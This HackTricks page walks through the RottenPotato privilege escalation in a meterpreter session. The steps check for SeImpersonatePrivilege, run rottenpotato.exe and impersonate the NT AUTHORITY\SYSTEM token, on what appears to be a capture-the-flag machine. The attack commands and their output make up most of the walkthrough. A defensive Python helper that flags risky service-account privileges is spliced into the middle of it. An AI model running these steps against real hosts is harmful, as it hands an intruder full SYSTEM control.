HackTricks
RottenPotato
Support HackTricks and get benefits!
A digital transformation tailored to your organization is unique. It also comes with its risks. Defend yourself against hackers. Get protection before it's too late. Talk to the professionals at Securityboat:
Let's connect - Securityboat
Securityboat - Frontline of Your Business
The info in this page was extracted from this post
Service accounts usually hold special privileges (SeImpersonatePrivilege), and this can be used to escalate privileges.
I won’t go into the details on how this exploit works, the article above explains it far better than I ever could.
Let’s check our privileges with meterpreter:
```
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
```
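The privileges listed above are the ones an auditor wants to spot on a service account before an attacker does. As an added example (not part of the HackTricks page or of RottenPotato), the following Python helper parses a meterpreter `getprivs` dump like the one above and, going one step beyond the page, the output of Windows' native `whoami /priv`, and flags the impersonation-related privileges a defender should review on each service account. The sample dumps are constructed from the listing above and from the standard `whoami /priv` column layout; privilege names and descriptions are the real Windows ones.

```python
# Added triage helper (not from the HackTricks page or RottenPotato):
# parse a token privilege dump and flag the privileges that turn a
# compromised service account into a privilege-escalation risk.
from __future__ import annotations

import re

# Privileges that let a process impersonate or assign another security
# context; these are the ones potato-style escalations rely on.
IMPERSONATION_PRIVS = {
    "SeImpersonatePrivilege": "impersonate a client after authentication",
    "SeAssignPrimaryTokenPrivilege": "replace a process-level token",
}

# meterpreter `getprivs` prints one bare privilege name per line.
GETPRIVS_RE = re.compile(r"^\s*(Se\w+Privilege)\s*$")
# `whoami /priv` prints: name, description, then Enabled/Disabled.
WHOAMI_RE = re.compile(r"^\s*(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_privileges(output: str) -> dict[str, str]:
    """Map privilege name -> state ('Enabled'/'Disabled') from either dump format."""
    privs: dict[str, str] = {}
    for line in output.splitlines():
        m = WHOAMI_RE.match(line)
        if m:
            privs[m.group(1)] = m.group(2)
            continue
        m = GETPRIVS_RE.match(line)
        if m:
            # getprivs only lists the enabled privileges of the process.
            privs[m.group(1)] = "Enabled"
    return privs


def risky_privileges(privs: dict[str, str]) -> dict[str, str]:
    """Return the impersonation privileges held by the token, with the reason they matter.

    A Disabled privilege still counts: a process holding it can re-enable it itself,
    so the review decision is about whether the account should hold it at all.
    """
    return {name: IMPERSONATION_PRIVS[name] for name in privs if name in IMPERSONATION_PRIVS}


def assess(output: str) -> dict:
    """Full triage result for one privilege dump."""
    privs = parse_privileges(output)
    risky = risky_privileges(privs)
    return {"privileges": privs, "risky": risky, "escalation_risk": bool(risky)}


# Constructed sample: the getprivs listing shown above (service account token).
SAMPLE_GETPRIVS = """\
Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
"""

# Constructed sample: a standard user token, for contrast.
SAMPLE_LOW_PRIV = """\
Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
"""

# Constructed sample in `whoami /priv` layout (not shown on the page).
SAMPLE_WHOAMI = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
"""

if __name__ == "__main__":
    for label, dump in (("service account", SAMPLE_GETPRIVS),
                        ("standard user", SAMPLE_LOW_PRIV),
                        ("whoami /priv", SAMPLE_WHOAMI)):
        result = assess(dump)
        print(f"{label}: {len(result['privileges'])} privileges, "
              f"escalation risk={result['escalation_risk']}")
        for name, why in result["risky"].items():
            print(f"  - {name} ({result['privileges'][name]}): {why}")
```

Run it against a dump collected from each service account's process and the accounts that come back with `escalation_risk` set are the ones to move to a less privileged identity (a virtual service account or a group managed service account) where the service does not actually need to impersonate clients.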
Excellent, it looks like we have the privileges we need to perform the attack. Let’s upload rottenpotato.exe.
Back on our meterpreter session we load the incognito extension.
```
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah

Impersonation Tokens Available
========================================
No tokens available
```
We can see we currently have no Impersonation Tokens. Let’s run the Rotten Potato exploit.
```
meterpreter > execute -f rottenpotato.exe -Hc
Process 3104 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM
```
We need to quickly impersonate the token or it will disappear.
```
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Success! We have our SYSTEM shell and can grab the root.txt file!